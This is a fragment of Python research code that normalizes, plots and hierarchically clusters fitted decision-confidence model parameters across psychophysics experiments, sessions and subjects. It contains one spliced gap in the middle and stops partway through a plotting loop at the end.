experimental[experimental_ind_names.index('session')][ind]\n\t\t\tname = experimental[experimental_ind_names.index('name')][ind]\n\t\t\tif len(theoretical_ind_names)==0:\n\t\t\t\ttheoretical_ind_names = ['experiment','name','session',\n\t\t\t\t\t\t\t\t\t\t 'full_merit','full_confidence_merit','confidence_only_merit',\n\t\t\t\t\t\t\t\t\t\t 'auc','rt_mean','hit_rt_mean','miss_rt_mean','performance_mean',\n\t\t\t\t\t\t\t\t\t\t 'confidence_mean','hit_confidence_mean','miss_confidence_mean',\n\t\t\t\t\t\t\t\t\t\t 'rt_median','hit_rt_median','miss_rt_median','confidence_median',\n\t\t\t\t\t\t\t\t\t\t 'hit_confidence_median','miss_confidence_median',\n\t\t\t\t\t\t\t\t\t\t 'cost','internal_var','phase_out_prob','dead_time','dead_time_sigma',\n\t\t\t\t\t\t\t\t\t\t 'high_confidence_threshold','confidence_map_slope']\n\t\t\t\tfor i in range(len(theoretical_ind_names)):\n\t\t\t\t\ttheoretical.append([])\n\t\t\tfor teo_k_ind,teo_k in enumerate(theoretical_ind_names):\n\t\t\t\tif teo_k=='experiment':\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,experiment)\n\t\t\t\telif teo_k=='session':\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,session)\n\t\t\t\telif teo_k=='name':\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,name)\n\t\t\t\telse:\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,np.nan)\n\t\t\n\t\tdtype_dict = {'experiment':'S'+str(max_experiment_len),\n\t\t\t\t\t 'n':'i',\n\t\t\t\t\t 'session':'i',\n\t\t\t\t\t 'name':'S'+str(max_name_len)}\n\t\texp_dtype = []\n\t\tfor exp_ind in experimental_ind_names:\n\t\t\ttry:\n\t\t\t\texp_dtype.append((str(exp_ind),dtype_dict[exp_ind]))\n\t\t\texcept:\n\t\t\t\texp_dtype.append((str(exp_ind),'f'))\n\t\tteo_dtype = []\n\t\tfor teo_ind in theoretical_ind_names:\n\t\t\ttry:\n\t\t\t\tteo_dtype.append((str(teo_ind),dtype_dict[teo_ind]))\n\t\t\texcept:\n\t\t\t\tteo_dtype.append((str(teo_ind),'f'))\n\t\tN = len(experimental[0])\n\t\texperimental_ = []\n\t\ttheoretical_ = []\n\t\tfor i in range(N):\n\t\t\texperimental_.append(tuple([e[i] for e in experimental]))\n\t\t\ttheoretical_.append(tuple([t[i] for t in theoretical]))\n\t\texperimental = np.array(experimental_,exp_dtype)\n\t\ttheoretical = np.array(theoretical_,teo_dtype)\n\t\t\n\t\tif normalize:\n\t\t\tgroup_dict = {'all':None,\n\t\t\t\t\t\t 'experiment':theoretical['experiment'],\n\t\t\t\t\t\t 'session':theoretical['session'],\n\t\t\t\t\t\t 'name':theoretical['name']}\n\t\t\tfor par in normalize.keys():\n\t\t\t\tgroup = group_dict[normalize[par]]\n\t\t\t\ttheoretical[par] = self.normalize_parameters(parameters=theoretical[par],\n\t\t\t\t\t\t\t\t\t group=group, normalization_function=normalization_function)\n\t\treturn experimental,theoretical\n\t\n\tdef normalize_parameters(self,parameters,group=None,normalization_function=lambda x: x/np.nanstd(x)):\n\t\t\"\"\"\n\t\tself.normalize_parameters(parameters,group,normalization_function=lambda x: x/np.nanstd(x))\n\t\t\n\t\tThe hierarchical clustering of parameters depends on the distance\n\t\tbetween parameters where each parameter name is interpreted as\n\t\ta separate dimension in a certain metric space (Default is\n\t\teuclidean but other metrics can be specified in the affinity).\n\t\tHowever, each parameter is usually located in an interval that\n\t\thas a completely different scale across experiments and parameter\n\t\tnames. This function seeks to normalize the parameter values\n\t\tto make them inhabit similarly sized regions, and thus improve\n\t\tthe clustering. The most problematic parameter is the\n\t\t'internal_var' because its units vary between experiments.\n\t\tTo solve this, normalize_parameters allows the user to specify\n\t\tdifferent grouping methods for different parameters.\n\t\t\n\t\tInput:\n\t\t\tparameters: A 1D numpy array with the parameter values for\n\t\t\t\ta single parameter name.\n\t\t\tgroup: Can be None or a 1D numpy array with the same\n\t\t\t\tnumber of elements as the input 'parameters'. The\n\t\t\t\tdistinct values of 'group' define separate groups\n\t\t\t\tand the normalization function is called separately\n\t\t\t\ton each group. For example, the input 'group'\n\t\t\t\tcould be an array with the corresponding experiment of\n\t\t\t\teach parameter value. Thus, the normalization_function\n\t\t\t\twould be called once for each experiment on the separate\n\t\t\t\tsubsets of parameters that corresponded to each\n\t\t\t\texperiment. If None, the normalization_function is\n\t\t\t\tcalled on the entire 'parameters' array.\n\t\t\tnormalization_function: A callable that is called on each\n\t\t\t\tgroup to normalize the parameter values. Default is\n\t\t\t\tlambda x: x/numpy.nanstd(x). Other normalization_function\n\t\t\t\timplementations must be able to broadcast numpy arrays,\n\t\t\t\treceive a single numpy array as input and return another\n\t\t\t\tnumpy array with the same shape as the input array.\n\t\t\t\t\n\t\t\n\t\tOutput:\n\t\t\tnormalized_parameters: A numpy array that is the result of\n\t\t\t\tcalling the normalization_function on each group.\n\t\t\n\t\t\"\"\"\n\t\tif group is None:\n\t\t\treturn normalization_function(parameters)\n\t\telse:\n\t\t\tnormalized_parameters = np.empty_like(parameters)\n\t\t\tunique_group = np.unique(group)\n\t\t\tfor g in unique_group:\n\t\t\t\tinds = group==g\n\t\t\t\tnormalized_parameters[inds] = normalization_function(parameters[inds])\n\t\t\treturn normalized_parameters\n\t\n\tdef scatter_parameters(self,merge=None,show=False):\n\t\t\"\"\"\n\t\tself.scatter_parameters(merge=None,show=False)\n\t\t\n\t\tPlot the parameters 'internal_var', 'cost' and 'phase_out_prob'\n\t\tagainst each other, and also plot 'high_confidence_threshold'\n\t\tagainst 'confidence_map_slope' in a 2x2 subplot with a colorbar\n\t\tthat represents subject names or experiments depending on the\n\t\t'merge' input value.\n\t\t\n\t\tInput:\n\t\t\tmerge: None, 'names' or 'sessions'. If None, all the parameters\n\t\t\t\tare plotted. If 'names', the parameters that correspond\n\t\t\t\tto different subject names but to the same experiment\n\t\t\t\tand session are pooled together. If 'sessions', the same\n\t\t\t\tprocedure is applied but for parameters that correspond\n\t\t\t\tto different sessions.\n\t\t\tshow: A bool that if True, shows the plotted figure and\n\t\t\t\tfreezes the execution until said figure is closed.\n\t\t\n\t\t\"\"\"\n\t\ttry:\n\t\t\tunames,indnames = np.unique(self._names,return_inverse=True)\n\t\texcept:\n\t\t\tself.get_parameter_array_from_summary()\n\t\t\tunames,indnames = np.unique(self._names,return_inverse=True)\n\t\tuexps,indexps = np.unique(self._experiments,return_inverse=True)\n\t\tusess,indsess = np.unique(self._sessions,return_inverse=True)\n\t\tif not merge is None:\n\t\t\tif merge=='names':\n\t\t\t\ttemp_pars = []\n\t\t\t\ttemp_sess = []\n\t\t\t\ttemp_exps = []\n\t\t\t\tfor e in uexps:\n\t\t\t\t\tfor s in usess:\n\t\t\t\t\t\tinds = np.logical_and(self._experiments==e,self._sessions==s)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\ttemp_pars.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\ttemp_sess.append(s)\n\t\t\t\t\t\t\ttemp_exps.append(e)\n\t\t\t\tnames = None\n\t\t\t\tparameters = np.array(temp_pars)\n\t\t\t\tsessions = np.array(temp_sess)\n\t\t\t\texperiments = np.array(temp_exps)\n\t\t\t\tcolors = ['r','g','b']\n\t\t\t\tcbar_im = np.array([[1,0,0],[0,0.5,0],[0,0,1]])\n\t\t\t\tcbar_labels = ['2AFC','Auditivo','Luminancia']\n\t\t\t\tcategories,ind_categories = np.unique(sessions,return_inverse=True)\n\t\t\t\tmarkers = ['o','s','D']\n\t\t\t\tlabels = ['Session 1','Session 2','Session 3']\n\t\t\telif merge=='sessions':\n\t\t\t\ttemp_pars = []\n\t\t\t\ttemp_nams = []\n\t\t\t\ttemp_exps = []\n\t\t\t\tfor e in uexps:\n\t\t\t\t\tfor n in unames:\n\t\t\t\t\t\tinds = np.logical_and(self._experiments==e,self._names==n)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\ttemp_pars.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\ttemp_nams.append(n)\n\t\t\t\t\t\t\ttemp_exps.append(e)\n\t\t\t\tsessions = None\n\t\t\t\tparameters = np.array(temp_pars)\n\t\t\t\tnames = np.array(temp_nams)\n\t\t\t\texperiments = np.array(temp_exps)\n\t\t\t\tunames,indnames = np.unique(names,return_inverse=True)\n\t\t\t\tcolors = [plt.get_cmap('rainbow')(x) for x in indnames.astype(np.float)/float(len(unames)-1)]\n\t\t\t\tcbar_im = np.array([plt.get_cmap('rainbow')(x) for x in np.arange(len(unames),dtype=np.float)/float(len(unames)-1)])\n\t\t\t\tcbar_labels = [str(n) for n in unames]\n\t\t\t\tcategories,ind_categories = np.unique(experiments,return_inverse=True)\n\t\t\t\tmarkers = ['o','s','D']\n\t\t\t\tlabels = ['2AFC','Auditivo','Luminancia']\n\t\t\telse:\n\t\t\t\traise ValueError('Unknown merge option: {0}'.format(merge))\n\t\telse:\n\t\t\tnames = np.copy(self._names)\n\t\t\tsessions = np.copy(self._sessions)\n\t\t\texperiments = np.copy(self._experiments)\n\t\t\tparameters = np.copy(self._parameters)\n\t\t\ta = np.array([sessions,experiments]).T\n\t\t\tb = np.ascontiguousarray(a).view(np.dtype((np.void, a.dtype.itemsize * a.shape[1])))\n\t\t\tcategories, ind_categories = np.unique(b, return_inverse=True)\n\t\t\tcolors = [plt.get_cmap('rainbow')(x) for x in indnames.astype(np.float)/float(len(unames)-1)]\n\t\t\tcbar_im = np.array([plt.get_cmap('rainbow')(x) for x in np.arange(len(unames),dtype=np.float)/float(len(unames)-1)])\n\t\t\tcbar_labels = [str(n) for n in unames]\n\t\t\tmarkers = ['o','+','s','^','v','8','D','*']\n\t\t\tlabels = []\n\t\t\tfor i,c in enumerate(categories):\n\t\t\t\tinds = ind_categories==i\n\t\t\t\tsession = sessions[inds][0]\n\t\t\t\texperiment = experiments[inds][0]\n\t\t\t\tlabels.append('Exp = '+str(experiment)+' Ses = '+str(session))\n\t\t\n\t\tdecision_inds = np.array([i for i,pn in enumerate(self._parameter_names) if pn in ['cost','internal_var','phase_out_prob']],dtype=np.intp)\n\t\tconfidence_inds = np.array([i for i,pn in enumerate(self._parameter_names) if pn in ['high_confidence_threshold','confidence_map_slope']],dtype=np.intp)\n\t\t\n\t\tplt.figure(figsize=(10,8))\n\t\tgs1 = gridspec.GridSpec(2, 2, left=0.05, right=0.85)\n\t\tgs2 = gridspec.GridSpec(1, 1, left=0.90, right=0.93)\n\t\tax1 = plt.subplot(gs1[0])\n\t\tax2 = plt.subplot(gs1[1])\n\t\tax3 = plt.subplot(gs1[2])\n\t\tax4 = plt.subplot(gs1[3])\n\t\tfor cat_index,category in enumerate(categories):\n\t\t\tinds = ind_categories==cat_index\n\t\t\tax1.scatter(parameters[inds,decision_inds[0]],parameters[inds,decision_inds[1]],c=colors,marker=markers[cat_index],cmap='rainbow')\n\t\t\tax2.scatter(parameters[inds,decision_inds[0]],parameters[inds,decision_inds[2]],c=colors,marker=markers[cat_index],cmap='rainbow')\n\t\t\tax3.scatter(parameters[inds,decision_inds[1]],parameters[inds,decision_inds[2]],c=colors,marker=markers[cat_index],cmap='rainbow')\n\t\t\tax4.scatter(parameters[inds,confidence_inds[0]],parameters[inds,confidence_inds[1]],c=colors,marker=markers[cat_index],cmap='rainbow',label=labels[cat_index])\n\t\tax1.set_xlabel(self._parameter_names[decision_inds[0]])\n\t\tax1.set_ylabel(self._parameter_names[decision_inds[1]])\n\t\tax2.set_xlabel(self._parameter_names[decision_inds[0]])\n\t\tax2.set_ylabel(self._parameter_names[decision_inds[2]])\n\t\tax3.set_xlabel(self._parameter_names[decision_inds[1]])\n\t\tax3.set_ylabel(self._parameter_names[decision_inds[2]])\n\t\tax4.legend(loc='upper center', fancybox=True, framealpha=0.5, scatterpoints=3)\n\t\tax4.set_xlabel(self._parameter_names[confidence_inds[0]])\n\t\tax4.set_ylabel(self._parameter_names[confidence_inds[1]])\n\t\t\n\t\tax_cbar = plt.subplot(gs2[0])\n\t\tplt.imshow(cbar_im.reshape((-1,1,cbar_im.shape[1])),aspect='auto',cmap=None,interpolation='none',origin='lower',extent=[0,1,0.5,len(cbar_labels)+0.5])\n\t\tax_cbar.xaxis.set_ticks([])\n\t\tax_cbar.yaxis.set_ticks(np.arange(len(cbar_labels))+1)\n\t\tax_cbar.yaxis.set_ticklabels(cbar_labels)\n\t\tax_cbar.tick_params(labelleft=False, labelright=True)\n\t\t\n\t\tif show:\n\t\t\tplt.show(True)\n\t\n\tdef controlled_scatter(self,scattered_parameters=['cost','internal_var','phase_out_prob'],axes=None,color_category='experiment',marker_category='session',merge=None,show=False):\n\t\t\"\"\"\n\t\tself.controlled_scatter(scattered_parameters=['cost','internal_var','phase_out_prob'],axes=None,color_category='experiment',marker_category='session',merge=None,show=False)\n\t\t\n\t\tA more refined version of the method scatter_parameters where\n\t\tit is posible to select the group of parameters to plot against\n\t\teach other, to which axes to plot them along with other options.\n\t\t\n\t\tInput:\n\t\t\tscattered_parameters: A list of valid Fitter parameter\n\t\t\t\tnames to plot against each other. The list must have 2\n\t\t\t\tor 3 elements, and the scatter will be in 2D or 3D\n\t\t\t\taccordingly.\n\t\t\taxes: None or a matplotlib.Axes or mpl_toolkits.mplot3d.Axes3D\n\t\t\t\tinstance. If None, the axes is created on the fly in a\n\t\t\t\tnew figure. If not None, then the supplied axes will be\n\t\t\t\tused to call the scatter method.\n\t\t\tcolor_category: Can be 'experiment', 'session' or 'name'. It\n\t\t\t\tis used to indicate if the maker's color should indicate\n\t\t\t\tthe corresponding experiment, session or subject name.\n\t\t\tmarker_category: Can be 'experiment' or 'session'. It is\n\t\t\t\tused to indicate if the maker should indicate the\n\t\t\t\tcorresponding experiment or session.\n\t\t\tmerge: Can be None, 'experiments', 'names' or 'sessions',\n\t\t\t\tand has the same behavior as the 'merge' input in\n\t\t\t\tthe scatter_parameters method. Refer to the\n\t\t\t\tscatter_parameters docstring for further details.\n\t\t\tshow: A bool that if True, shows the plotted figure and\n\t\t\t\tfreezes the execution until said figure is closed.\n\t\t\n\t\tOutput:\n\t\t\tIf show is True, this function returns None.\n\t\t\tIf show is False, this function returns the Axes instance\n\t\t\twhich was used to scatter the parameters.\n\t\t\n\t\t\"\"\"\n\t\tif len(scattered_parameters)<2 or len(scattered_parameters)>3:\n\t\t\traise ValueError('Can only scatter sets of 2 or 3 parameters. User supplied scattered_parameters={0}'.format(scattered_parameters))\n\t\telif len(scattered_parameters)==2:\n\t\t\tthreeD = False\n\t\telse:\n\t\t\tthreeD = True\n\t\ttry:\n\t\t\tparams = self._parameters\n\t\texcept:\n\t\t\tself.get_parameter_array_from_summary()\n\t\t\tparams = self._parameters\n\t\t_x = params[:,self._parameter_names.index(scattered_parameters[0])]\n\t\t_y = params[:,self._parameter_names.index(scattered_parameters[1])]\n\t\tif threeD:\n\t\t\t_z = params[:,self._parameter_names.index(scattered_parameters[2])]\n\t\telse:\n\t\t\t_z = None\n\t\tif color_category not in [None,'experiment','session','name']:\n\t\t\traise ValueError(\"color_category must be in [None,'experiment','session','name']. User supplied: {0}\".format(color_category))\n\t\tif marker_category not in [None, 'experiment','session']:\n\t\t\traise ValueError(\"marker_category must be in [None,'experiment','session']. User supplied: {0}\".format(marker_category))\n\t\tif marker_category==color_category and not marker_category is None:\n\t\t\traise ValueError(\"If color_category and marker_category are not None, they must be different\")\n\t\tif merge==(marker_category+'s') or merge==(color_category+'s'):\n\t\t\traise ValueError(\"Cannot set merge equal to color_category or marker_category\")\n\t\t\n\t\tif not merge is None:\n\t\t\tunams,indnams = np.unique(self._names,return_inverse=True)\n\t\t\tusess,indsess = np.unique(self._sessions,return_inverse=True)\n\t\t\tuexps,indexps = np.unique(self._experiments,return_inverse=True)\n\t\t\tcat_inds = []\n\t\t\tnames = []\n\t\t\tsessions = []\n\t\t\texperiments = []\n\t\t\tif merge=='experiments':\n\t\t\t\tfor i,un in enumerate(unams):\n\t\t\t\t\tfor us in usess:\n\t\t\t\t\t\tinds = np.logical_and(self._names==un,self._sessions==us)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tcat_inds.append(inds)\n\t\t\t\t\t\t\tnames.append(i)\n\t\t\t\t\t\t\tsessions.append(us)\n\t\t\telif merge=='sessions':\n\t\t\t\tfor i,un in enumerate(unams):\n\t\t\t\t\tfor ue in uexps:\n\t\t\t\t\t\tinds = np.logical_and(self._names==un,self._experiments==ue)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tcat_inds.append(inds)\n\t\t\t\t\t\t\tnames.append(i)\n\t\t\t\t\t\t\texperiments.append(ue)\n\t\t\telif merge=='names':\n\t\t\t\tfor ue in uexps:\n\t\t\t\t\tfor us in usess:\n\t\t\t\t\t\tinds = np.logical_and(self._experiments==ue,self._sessions==us)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tcat_inds.append(inds)\n\t\t\t\t\t\t\texperiments.append(ue)\n\t\t\t\t\t\t\tsessions.append(us)\n\t\t\telse:\n\t\t\t\traise ValueError(\"Unknown merge option supplied: {0}. Available options are None, 'experiments', 'sessions' or 'names'\".format(merge))\n\t\t\tx = []\n\t\t\ty = []\n\t\t\tif threeD:\n\t\t\t\tz = []\n\t\t\tfor inds in cat_inds:\n\t\t\t\tx.append(self.pooling_func(_x[inds],axis=0))\n\t\t\t\ty.append(self.pooling_func(_y[inds],axis=0))\n\t\t\t\tif threeD:\n\t\t\t\t\tz.append(self.pooling_func(_z[inds],axis=0))\n\t\t\tx = np.array(x)\n\t\t\ty = np.array(y)\n\t\t\tif threeD:\n\t\t\t\tz = np.array(z)\n\t\telse:\n\t\t\tunams,names = np.unique(self._names,return_inverse=True)\n\t\t\tsessions = self._sessions\n\t\t\texperiments = self._experiments\n\t\t\tx = _x\n\t\t\ty = _y\n\t\t\tif threeD:\n\t\t\t\tz = _z\n\t\t\n\t\tif not color_category is None:\n\t\t\tif color_category=='experiment':\n\t\t\t\tc = [{'2AFC':[1.,0.,0.],'Auditivo':[0.,0.5,0.],'Luminancia':[0.,0.,1.]}[exp] for exp in experiments]\n\t\t\telif color_category=='session':\n\t\t\t\tc = [{'1':[1.,0.,0.],'2':[0.,0.5,0.],'3':[0.,0.,1.]}[ses] for ses in sessions]\n\t\t\telse:\n\t\t\t\tc = [plt.get_cmap('rainbow')(x) for x in names.astype(np.float)/float(len(unams)-1)]\n\t\t\tc = np.array(c)\n\t\telse:\n\t\t\tc = 'k'\n\t\t\t\n\t\tif not marker_category is None:\n\t\t\tif marker_category=='experiment':\n\t\t\t\tuexps,indexps = np.unique(experiments,return_inverse=True)\n\t\t\t\tmarker_inds = [indexps==i for i,ue in enumerate(uexps)]\n\t\t\t\tmarkers = [{'2AFC':'o','Auditivo':'s','Luminancia':'D'}[exp] for exp in uexps]\n\t\t\t\tlabels = [{'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}[exp] for exp in uexps]\n\t\t\telse:\n\t\t\t\tusess,indsess = np.unique(sessions,return_inverse=True)\n\t\t\t\tmarker_inds = [indsess==i for i,ue in enumerate(usess)]\n\t\t\t\tmarkers = [{1:'o',2:'s',3:'D'}[int(ses)] for ses in usess]\n\t\t\t\tlabels = [{1:'Ses 1',2:'Ses 2',3:'Ses 3'}[int(ses)] for ses in usess]\n\t\telse:\n\t\t\tmarker_inds = [np.ones(len(x),dtype=np.bool)]\n\t\t\tmarkers = ['c']\n\t\t\tlabels = [None]\n\t\t\n\t\tif axes is None:\n\t\t\tfig = plt.figure()\n\t\t\tif threeD:\n\t\t\t\taxes = fig.add_subplot(111, projection='3d')\n\t\t\telse:\n\t\t\t\taxes = plt.subplot(111)\n\t\t\n\t\tparameter_aliases = {'cost':r'$c$',\\\n\t\t\t\t\t\t\t'internal_var':r'$\\sigma^{2}$',\\\n\t\t\t\t\t\t\t'phase_out_prob':r'$p_{po}$',\\\n\t\t\t\t\t\t\t'high_confidence_threshold':r'$C_{H}$',\\\n\t\t\t\t\t\t\t'confidence_map_slope':r'$\\alpha$',\\\n\t\t\t\t\t\t\t'dead_time':r'$\\tau_{c}$',\\\n\t\t\t\t\t\t\t'dead_time_sigma':r'$\\sigma_{c}$'}\n\t\tif not threeD:\n\t\t\tfor m,inds,label in zip(markers,marker_inds,labels):\n\t\t\t\ttry:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],c=c[inds],marker=m, s=40, label=label)\n\t\t\t\texcept:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],c=c,marker=m, s=40, label=label)\n\t\t\taxes.set_xlabel(parameter_aliases[scattered_parameters[0]],fontsize=16)\n\t\t\taxes.set_ylabel(parameter_aliases[scattered_parameters[1]],fontsize=16)\n\t\t\taxes.set_xticklabels([])\n\t\t\taxes.set_yticklabels([])\n\t\telse:\n\t\t\tfor m,inds,label in zip(markers,marker_inds,labels):\n\t\t\t\ttry:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],z[inds],c=c[inds],marker=m, s=40, label=label)\n\t\t\t\texcept:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],z[inds],c=c,marker=m, s=40, label=label)\n\t\t\taxes.set_xlabel(parameter_aliases[scattered_parameters[0]],fontsize=16)\n\t\t\taxes.set_ylabel(parameter_aliases[scattered_parameters[1]],fontsize=16)\n\t\t\taxes.set_zlabel(parameter_aliases[scattered_parameters[2]],fontsize=16)\n\t\t\taxes.view_init(elev=None,azim=145)\n\t\t\taxes.set_xticklabels([])\n\t\t\taxes.set_yticklabels([])\n\t\t\taxes.set_zticklabels([])\n\t\t\n\t\tif show:\n\t\t\tplt.show(True)\n\t\t\treturn None\n\t\telse:\n\t\t\treturn axes\n\t\n\tdef cluster(self,merge=None,clustered_parameters=['cost','internal_var','phase_out_prob'],filter_nans='post'):\n\t\t\"\"\"\n\t\tself.cluster(merge=None,clustered_parameters=['cost','internal_var','phase_out_prob'],filter_nans='post')\n\t\t\n\t\tMethod that performs the hierarchical clustering of the Fitter\n\t\tparameters.\n\t\t\n\t\tInput:\n\t\t\tmerge: None, or 'experiments', 'sessions', 'names'. This\n\t\t\t\tinput specifies if and how the parameters should be\n\t\t\t\tmerged before being clustered. Initially, there is one\n\t\t\t\tparameter vector for each individual experiment, session\n\t\t\t\tand name tuple. If merge is None, all the individual\n\t\t\t\tparameters are used for the clustering. If 'experiments',\n\t\t\t\tall the parameters that correspond to the same 'name' and\n\t\t\t\t'session' pairs are merged (the different experiments\n\t\t\t\tare pooled together). Analoguously, for 'sessions' and\n\t\t\t\t'names' the different session and different name values,\n\t\t\t\tcorrespondingly, are pooled together.\n\t\t\tclustered_parameters: A list of valid Fitter parameter names.\n\t\t\t\tIf None, all the available Fitter parameter names are\n\t\t\t\tused. Each parameter name represents a different dimension\n\t\t\t\tof each parameter array that is passed to the clustering\n\t\t\t\tfit function.\n\t\t\tfilter_nans: A str that can be 'pre', 'post' or 'none' that\n\t\t\t\tindicates if and how the nans should be handled. If\n\t\t\t\t'none', no handling is performed. If 'pre', the parameter\n\t\t\t\tarray that holds a nan value in any parameter name, even\n\t\t\t\tif it is not in the clustered_parameters list is removed.\n\t\t\t\tIf 'post', only the parameters that have a nan value in\n\t\t\t\tone of the clustered_parameters is removed.\n\t\t\n\t\tOutput:\n\t\t\ttree: An ete3.Tree instance that is built from the Newick\n\t\t\t\trepresentation of the\n\t\t\t\tsklearn.cluster.AgglomerativeClustering.fit() tree\n\t\t\t\tstructure.\n\t\t\n\t\t\"\"\"\n\t\tif not filter_nans in ['pre','post','none']:\n\t\t\traise ValueError('filter_nans must be \"pre\", \"post\" or \"none\". User supplied {0}'.format(filter_nans))\n\t\ttry:\n\t\t\tparameter_names = self._parameter_names\n\t\texcept:\n\t\t\tself.get_parameter_array_from_summary()\n\t\t\tparameter_names = self._parameter_names\n\t\tclustered_parameters_inds = np.zeros(len(parameter_names),dtype=np.bool)\n\t\tif clustered_parameters is None:\n\t\t\tclustered_parameters = parameter_names\n\t\tfor cpar in clustered_parameters:\n\t\t\ttry:\n\t\t\t\tindex = parameter_names.index(cpar)\n\t\t\texcept:\n\t\t\t\traise ValueError('Clustered parameters must be in {0}. User supplied {1}'.format(parameter_names,cpar))\n\t\t\tclustered_parameters_inds[index] = True\n\t\t\n\t\tif merge is None:\n\t\t\tX = self._parameters\n\t\t\tleaf_labels = [str(e).strip('\\x00')+'_subj_'+str(n).strip('\\x00')+'_ses_'+str(s).strip('\\x00') for e,n,s in zip(self._experiments,self._names,self._sessions)]\n\t\telse:\n\t\t\tuexps,invexps = np.unique(self._experiments,return_inverse=True)\n\t\t\tusess,invsess = np.unique(self._sessions,return_inverse=True)\n\t\t\tunams,invnams = np.unique(self._names,return_inverse=True)\n\t\t\tX = []\n\t\t\tleaf_labels = []\n\t\t\tif merge=='experiments':\n\t\t\t\tfor i,us in enumerate(usess):\n\t\t\t\t\tfor j,un in enumerate(unams):\n\t\t\t\t\t\tinds = np.logical_and(invsess==i,invnams==j)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tX.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\tleaf_labels.append('subj_'+str(un)+'_ses_'+str(us))\n\t\t\telif merge=='sessions':\n\t\t\t\tfor i,ue in enumerate(uexps):\n\t\t\t\t\tfor j,un in enumerate(unams):\n\t\t\t\t\t\tinds = np.logical_and(invexps==i,invnams==j)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tX.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\tleaf_labels.append(str(ue)+'_subj_'+str(un))\n\t\t\telif merge=='names':\n\t\t\t\tfor i,us in enumerate(usess):\n\t\t\t\t\tfor j,ue in enumerate(uexps):\n\t\t\t\t\t\tinds = np.logical_and(invsess==i,invexps==j)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tX.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\tleaf_labels.append(str(ue)+'_ses_'+str(us))\n\t\t\telse:\n\t\t\t\traise ValueError('Unknown merge option: {0}'.format(merge))\n\t\t\tX = np.array(X)\n\t\t# Select X\n\t\tif filter_nans=='pre':\n\t\t\tX = X[np.logical_not(np.any(np.isnan(X),axis=1))]\n\t\tX = X[:,clustered_parameters_inds]\n\t\tif filter_nans=='post':\n\t\t\tX = X[np.logical_not(np.any(np.isnan(X),axis=1))]\n\t\tself.agg_clusterer.fit(X)\n\t\tnewick_tree = self.build_Newick_tree(self.agg_clusterer.children_,self.agg_clusterer.n_leaves_,X,leaf_labels)\n\t\ttree = ete3.Tree(newick_tree)\n\t\treturn tree\n\t\n\tdef build_Newick_tree(self,children,n_leaves,X,leaf_labels):\n\t\t\"\"\"\n\t\tself.build_Newick_tree(children,n_leaves,X,leaf_labels)\n\t\t\n\t\tGet a string representation (Newick tree) from the sklearn\n\t\tAgglomerativeClustering.fit output.\n\t\t\n\t\tInput:\n\t\t\tchildren: AgglomerativeClustering.children_\n\t\t\tn_leaves: AgglomerativeClustering.n_leaves_\n\t\t\tX: parameters supplied to AgglomerativeClustering.fit\n\t\t\tleaf_labels: The label of each parameter array in X\n\t\t\n\t\tOutput:\n\t\t\tntree: A str with the Newick tree representation\n\t\t\n\t\t\"\"\"\n\t\treturn self.go_down_tree(children,n_leaves,X,leaf_labels,len(children)+n_leaves-1)[0]+';'\n\t\n\tdef go_down_tree(self,children,n_leaves,X,leaf_labels,nodename):\n\t\t\"\"\"\n\t\tself.go_down_tree(children,n_leaves,X,leaf_labels,nodename)\n\t\t\n\t\tIterative function that traverses the subtree that descends from\n\t\tnodename and returns the Newick representation of the subtree.\n\t\t\n\t\tInput:\n\t\t\tchildren: AgglomerativeClustering.children_\n\t\t\tn_leaves: AgglomerativeClustering.n_leaves_\n\t\t\tX: parameters supplied to AgglomerativeClustering.fit\n\t\t\tleaf_labels: The label of each parameter array in X\n\t\t\tnodename: An int that is the intermediate node name whos\n\t\t\t\tchildren are located in children[nodename-n_leaves].\n\t\t\n\t\tOutput:\n\t\t\tntree: A str with the Newick tree representation\n\t\t\n\t\t\"\"\"\n\t\tnodeindex = nodename-n_leaves\n\t\tif nodename0.05] = np.nan\n\t\tc1s.append(c1)\n\t\t\n\t\t# Test pearson correlation treating the parameters as categories\n\t\tp2 = temp.reshape((-1,temp.shape[-1])).T\n\t\tc2,pval2 = utils.corrcoef(p2,method='pearson')\n\t\t#~ np.fill_diagonal(c2, np.nan)\n\t\t#~ np.fill_diagonal(pval2, np.nan)\n\t\tpval2 = correct_rho_pval(pval2)\n\t\tc2[pval2>0.05] = np.nan\n\t\tc2s.append(c2)\n\t\t\n\texp_alias = {'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}\n\tpar_alias = {'cost':r'$c$',\\\n\t\t\t\t'internal_var':r'$\\sigma^{2}$',\\\n\t\t\t\t'phase_out_prob':r'$p_{po}$',\\\n\t\t\t\t'high_confidence_threshold':r'$C_{H}$',\\\n\t\t\t\t'confidence_map_slope':r'$\\alpha$',\\\n\t\t\t\t'dead_time':r'$\\tau_{c}$',\\\n\t\t\t\t'dead_time_sigma':r'$\\sigma_{c}$'}\n\t\n\tvmin1 = np.nanmin(np.array([np.nanmin(c) for c in c1s]))\n\tvmin2 = np.nanmin(np.array([np.nanmin(c) for c in c2s]))\n\tvmax1 = np.nanmax(np.array([np.nanmax(c) for c in c1s]))\n\tvmax2 = np.nanmax(np.array([np.nanmax(c) for c in c2s]))\n\tplt.figure(figsize=(14,10))\n\tfor i,used_parameters in 